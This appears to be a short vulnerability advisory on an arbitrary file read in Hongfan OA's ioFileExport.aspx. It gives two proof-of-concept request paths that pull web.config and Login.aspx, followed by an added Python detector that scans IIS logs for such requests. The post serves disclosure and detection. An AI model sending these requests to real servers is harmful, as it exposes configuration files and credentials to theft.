Hongfan OA ioFileExport.aspx Arbitrary File Reading Vulnerability
Vulnerability Description
The ioFileExport.aspx page in Hongfan OA has an arbitrary file read vulnerability. An attacker can use it to obtain sensitive information from the server.
Vulnerability Impact
Hongfan OA
Network surveying and mapping
Vulnerability Reproduction
Login page
Verify with the PoC by reading the web.config file:
/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream
/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream
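For detection, the requests above leave a recognisable trace in the web server log. The following is an added example, not part of the original post: it scans IIS W3C log lines for requests to ioFileExport.aspx whose url parameter points at a source or configuration file. The log field layout, the sample lines and the list of sensitive extensions are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and parameter name are taken from the PoC requests above.
ENDPOINT = "/ioffice/prg/set/iocom/iofileexport.aspx"
# Assumption: file types an export helper has no reason to serve, plus path traversal.
SENSITIVE = re.compile(r"\.(config|aspx|ashx|asmx|cs|dll|mdb|bak|ini)$|\.\.[\\/]", re.I)

# Constructed sample log (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:01 GET /ioffice/Login.aspx - 192.0.2.10 200
2024-01-01 10:00:05 GET /ioffice/prg/set/iocom/ioFileExport.aspx url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream 192.0.2.10 200
2024-01-01 10:00:09 GET /ioffice/prg/set/iocom/ioFileExport.aspx url=%2Fioffice%2FLogin.aspx&filename=test.txt 192.0.2.11 200
2024-01-01 10:01:00 GET /ioffice/prg/set/iocom/ioFileExport.aspx url=/ioffice/upload/report.xlsx&filename=report.xlsx 198.51.100.7 200
2024-01-01 10:02:00 GET /ioffice/prg/set/iocom/ioFileExport.aspx url=/ioffice/web.config&filename=a.txt 192.0.2.12 404
"""

def scan(log_text):
    """Return one finding per ioFileExport.aspx request whose url targets a sensitive file."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C header directives
        parts = line.split()
        if len(parts) != 7:
            continue  # not in the assumed field layout
        date, time, _method, stem, query, client, status = parts
        if stem.lower() != ENDPOINT:
            continue
        # ASP.NET treats query keys case-insensitively, so normalise them.
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        for target in params.get("url", []):
            decoded = unquote(target)  # second decode catches double-encoded paths
            if SENSITIVE.search(decoded):
                findings.append({
                    "when": f"{date} {time}", "client": client,
                    "target": decoded, "served": status == "200",
                })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "served" set to True means the server answered 200, so the named file should be treated as disclosed and any secrets in it rotated.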
This post is licensed under CC BY 4.0 by the author.